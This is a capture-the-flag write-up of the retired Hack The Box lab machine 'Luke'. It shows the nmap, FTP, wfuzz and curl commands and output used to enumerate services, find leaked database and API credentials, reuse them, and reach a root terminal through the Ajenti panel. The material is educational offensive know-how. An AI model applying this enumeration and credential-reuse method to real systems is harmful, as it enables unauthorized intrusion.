Hack The Box - Luke

Quick Summary

Hey guys today Luke retired and here’s my write-up about it. It was an easy machine, all you need to do is to enumerate well and you’ll find what you need. It’s a FreeBSD box and its ip is 10.10.10.137 , I added it to /etc/hosts as luke.htb . Let’s jump right in !



Nmap

As always we will start with nmap to scan for open ports and services :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

root@kali:~/Desktop/HTB/boxes/luke# nmap -sV -sT -sC -o nmapinitial luke.htb

Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-13 12:57 EET

Nmap scan report for luke.htb (10.10.10.137)

Host is up (0.23s latency).

Not shown: 995 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3+ (ext.1)

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp

| ftp-syst:

| STAT:

| FTP server status:

| Connected to 10.10.xx.xx

| Logged in as ftp

| TYPE: ASCII

| No session upload bandwidth limit

| No session download bandwidth limit

| Session timeout in seconds is 300

| Control connection is plain text

| Data connections will be plain text

| At session startup, client count was 4

| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable

|_End of status

22/tcp open ssh?

80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3

|_http-title: Luke

3000/tcp open http Node.js Express framework

|_http-title: Site doesn't have a title (application/json; charset=utf-8).

8000/tcp open http Ajenti http control panel

|_http-title: Ajenti



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 202.84 seconds

root@kali:~/Desktop/HTB/boxes/luke#



We have ftp on port 21, http on ports 80, 3000, 8000 and ssh . From the http-title we can see that on port 3000 there’s a node.js application and Ajenti Administration Panel on port 8000. But before checking the web services let’s take a look at ftp .

FTP

Anonymous login was allowed, there was only one directory called webapp which had a text file called for_Chihiro.txt :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

root@kali:~/Desktop/HTB/boxes/luke# ftp luke.htb

Connected to luke.htb.

220 vsFTPd 3.0.3+ (ext.1) ready...

Name (luke.htb:root): anonymous

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp

226 Directory send OK.

ftp> cd webapp

250 Directory successfully changed.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

-r-xr-xr-x 1 0 0 306 Apr 14 12:37 for_Chihiro.txt

226 Directory send OK.

ftp> get for_Chihiro.txt

local: for_Chihiro.txt remote: for_Chihiro.txt

200 PORT command successful. Consider using PASV.

150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).

226 Transfer complete.

306 bytes received in 0.00 secs (236.0412 kB/s)

ftp> 221 Goodbye.



for_Chihiro.txt :

1

2

3

4

5

6

7

Dear Chihiro !!



As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of

the actual website I've created .

Normally you should know where to look but hurry up because I will delete them soon because of our security policies !



Derry



From this note we get two potential usernames : Chihiro and Derry .

Also, now we know that we can find some source files somewhere, let’s check out the web services.

Web Enumeration, User and Root Flags

On port 80 there was this simple website :





Nothing was really interesting so I bruteforced directories and pages with wfuzz :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt



Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.



********************************************************

* Wfuzz 2.3.4 - The Web Fuzzer *

********************************************************



Target: http://luke.htb/FUZZ

Total requests: 4614



==================================================================

ID Response Lines Word Chars Payload

==================================================================



000011: C=403 9 L 24 W 213 Ch ".hta"

000001: C=200 108 L 240 W 3138 Ch ""

000012: C=403 9 L 24 W 218 Ch ".htaccess"

000013: C=403 9 L 24 W 218 Ch ".htpasswd"

001114: C=301 7 L 20 W 228 Ch "css"

002020: C=200 108 L 240 W 3138 Ch "index.html"

002179: C=301 7 L 20 W 227 Ch "js"

002282: C=200 21 L 172 W 1093 Ch "LICENSE"

002435: C=401 12 L 46 W 381 Ch "management"

002485: C=301 7 L 20 W 231 Ch "member"

004286: C=301 7 L 20 W 231 Ch "vendor"



Total time: 116.3713

Processed Requests: 4614

Filtered Requests: 4603

Requests/sec.: 39.64892



root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb/FUZZ.php -w /usr/share/wordlists/dirb/common.txt



Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.



********************************************************

* Wfuzz 2.3.4 - The Web Fuzzer *

********************************************************



Target: http://luke.htb/FUZZ.php

Total requests: 4614



==================================================================

ID Response Lines Word Chars Payload

==================================================================



000011: C=403 9 L 24 W 217 Ch ".hta"

000012: C=403 9 L 24 W 222 Ch ".htaccess"

000013: C=403 9 L 24 W 222 Ch ".htpasswd"

000994: C=200 6 L 25 W 202 Ch "config"

002347: C=200 39 L 118 W 1593 Ch "login"



Total time: 140.0363

Processed Requests: 4614

Filtered Requests: 4609

Requests/sec.: 32.94859



We got /management , /member , /login.php and /config.php . I checked config.php first :



1

$dbHost = 'localhost' ; $dbUsername = 'root' ; $dbPassword = 'Zk6heYCyv6ZE9Xcg' ; $db = "login" ; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die ( "Connect failed: %s

" . $conn -> error);



Great, we got database credentials, I tried to ssh into the box with them but it didn’t work.

/login.php :



Also the credentials didn’t work here.

/management :



It uses http basic authentication, I tried to login but again the credentials didn’t work.

/member was just empty :



On port 8000 there was Ajenti :



Ajenti: An admin’s tool for a more civilized age, providing you with a fast and secure way to manage a remote Linux box at any time using everyday tools like a web terminal, text editor, file manager and others. -ajenti.org

Ajenti provides a terminal, so if we could access Ajenti then we got a shell. However, the credentials didn’t work here too :



The only thing left is the node.js application, which uses JWT tokens for authentication :

1

2

root@kali:~/Desktop/HTB/boxes/luke# curl http://luke.htb:3000/

{ "success" : false , "message" : "Auth token is not supplied" }



I googled that error message and found this article on medium : A guide for adding JWT token-based authentication to your single page Node.js applications.

I fuzzed the application to verify that the endpoint /login exists :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb:3000/FUZZ -w /usr/share/wordlists/dirb/common.txt



Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.



********************************************************

* Wfuzz 2.3.4 - The Web Fuzzer *

********************************************************



Target: http://luke.htb:3000/FUZZ

Total requests: 4614



==================================================================

ID Response Lines Word Chars Payload

==================================================================



000001: C=200 0 L 5 W 56 Ch ""

002347: C=200 0 L 2 W 13 Ch "login"

002348: C=200 0 L 2 W 13 Ch "Login"

004245: C=200 0 L 5 W 56 Ch "users"



Total time: 147.3540

Processed Requests: 4614

Filtered Requests: 4610

Requests/sec.: 31.31234



/login exists and there’s also another endpoint called /users which can’t be accessed without authentication too :

1

2

root@kali:~/Desktop/HTB/boxes/luke# curl http://luke.htb:3000/users

{ "success" : false , "message" : "Auth token is not supplied" }



I tried to login with the credentials but it failed :

1

2

root@kali:~/Desktop/HTB/boxes/luke# curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg","username":"root"}' http://luke.htb:3000/login

Forbidden



So I tried the same username from the article ( admin ) instead of root and it worked :

1

2

kali:~/Desktop/HTB/boxes/luke# curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg","username":"admin"}' http://luke.htb:3000/login

{ "success" : true , "message" : "Authentication successful!" , "token" : "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us" }



Now we can access the application with our token :

1

2

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/

{ "message" : "Welcome admin ! " }



/users returned a list of these users :

1

2

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users

[{ "ID" : "1" , "name" : "Admin" , "Role" : "Superuser" },{ "ID" : "2" , "name" : "Derry" , "Role" : "Web Admin" },{ "ID" : "3" , "name" : "Yuri" , "Role" : "Beta Tester" },{ "ID" : "4" , "name" : "Dory" , "Role" : "Supporter" }]



After trying different things, /users/username revealed more info about each user :

1

2

3

4

5

6

7

8

9

10

11

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/admin

{ "name" : "Admin" , "password" : "WX5b7)>/rp$U)FW" }



root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/derry

{ "name" : "Derry" , "password" : "rZ86wwLvx7jUxtch" }



root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/yuri

{ "name" : "Yuri" , "password" : "bet@tester87" }



root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/dory

{ "name" : "Dory" , "password" : "5y:!xa=ybfe)/QD" }



After trying these credentials everywhere, I could login to /management as Derry :





These are the source files Derry was talking about in the note we got from the ftp server. In config.json I found some stuff related to Ajenti and I found the password for the user root :







Now we can start a terminal as root and get the flags :



And we owned root.

That’s it , Feedback is appreciated !

Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Bastion

Next Hack The Box write-up : Hack The Box - Kryptos